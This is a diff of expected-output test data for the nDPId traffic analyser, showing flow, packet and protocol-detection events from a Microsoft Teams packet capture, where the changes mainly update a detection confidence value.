{"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01032{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2446,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692808,"flow_last_seen":1587041692881,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041692881,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01086{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2448,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041692808,"flow_last_seen":1587041692953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041692953,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041693412} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041693383,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2464,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693428,"flow_last_seen":1587041693428,"flow_idle_time":200000,"flow_min_l4_payload_len":977,"flow_max_l4_payload_len":977,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":977,"midstream":0,"thread_ts_msec":1587041693428,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -391,43 +397,45 @@ 00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2481,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1587041693475,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1587041693475,"pkt":"KDc3AG3IEBMx8Tl2CABFAADdNJMAAGwR1dQ0ck2IwKgBBg2WyeEAyV65B51cqyKYlOqfHC4eUj71t0+3OzD2kNc2OfFPQNt7fwvuOZltdCnrcr0l94iSgE3VeMj4bdDb+vZ+CObqTNO+QGlUnkV8bcknbNvGUx42nvxp8mhw\/srnkVApKnhDe\/uy29skE82ON2NOubAQd6VBKyo6DT6MaE1A1qjybrSe5XwDrj8OJ1EA\/FUFx\/b063Ar395Oi1sw+DBTZ16KUXaymVRCSFNXRrfz6yWlsSmdtxTLQfpVrW5dlejTUGgaSVxvSg=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1587041693515,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693515,"pkt":"EBMx8Tl2KDc3AG3ICABFAABg5p0AAEARo1PAqAEGNHL6e8NgDZYATAKlAAMAMCESpEKyND9uZ\/QdWKy6Y58ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693516,"flow_last_seen":1587041693516,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693516,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1587041693516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693516,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NiAbvwxDFFAAAAALAC\/\/9VoQAAAgQFtAEDAwUBAQgKMITZEwAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1587041693517,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":109,"pkt_l4_len":75,"thread_ts_msec":1587041693517,"pkt":"EBMx8Tl2KDc3AG3ICABFAABfDxsAAP8RKRvAqAEGwKgBAdnVADUASzsZd8IBAAABAAAAAAAAEmItdHItdGVhbXMtZXVuby0wNQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AABwAAQ=="} -00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1587041693530,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1587041693530,"pkt":"KDc3AG3IEBMx8Tl2CABFAACrU5xAADkRak7AqAEBwKgBBgA12dUAlwAAd8KBgAABAAAAAQAAEmItdHItdGVhbXMtZXVuby0wNQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AABwAAcAfAAYAAQAAAAUAQARwcmQxDmF6dXJlZG5zLWNsb3VkA25ldAAGbXNuaHN0CW1pY3Jvc29mdMA6AAAnEQAAA4QAAAEsAAk6gAAAADw="} -00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041693530,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041693530,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2486,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1587041693561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693561,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZBAAGwGgJc0cvp7wKgBBgG7w2KOQNor8MQxRoAS\/\/8u4wAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2487,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1587041693561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693561,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NiAbvwxDFGjkDaLFAQIABPogAA"} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2488,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693516,"flow_last_seen":1587041693561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693561,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2488,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693516,"flow_last_seen":1587041693561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693561,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2489,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1587041693572,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693572,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXfJQAAGwR4OU0cvp7wKgBBg2Ww2AAw6emARMApyESpEKyND9uZ\/QdWKy6Y58ADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+o0AFAAUAk7L+IJ6YNZTBt6\/p32H0UQC3V0AFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6jYCVAAh\/IMTdT4SN+oAgAAgAAcHVcadqCg=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1587041693582,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693582,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgF74AAEARcjPAqAEGNHL6e8N0DZYATEppAAMAMCESpEI9x0RmdejywONbcT4ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1587041693582,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693582,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NlAbtcWVYoAAAAALAC\/\/\/E5AAAAgQFtAEDAwUBAQgKMITZVQAAAAAEAgAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":200000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1587041693597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693597,"pkt":"EBMx8Tl2KDc3AG3ICABFAADyLLYAAEARXJfAqAEGNHL6jcNgDZYA3iTJAAMAwiESpEIiL+\/H85JL0bmXJ+QADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIfyDE3U+EjfoAFAAUAk7L+IJ6YNZTBt6\/p32H0UQC3V0AFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACB+ROZSH0cQpVQPYpCmfWn5X6jy8HHHqFihd3XDn9tzDQ=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":200000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":200000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00987{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2495,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041693516,"flow_last_seen":1587041693608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1639,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1587041693608,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2510,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041693611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2510,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041693609,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1587041693611,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693611,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgfyMAAEARCrzAqAEGNHL6jcNhDZYATBjuAAMAMCESpELalY8VcoE3uJ+0vVMADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 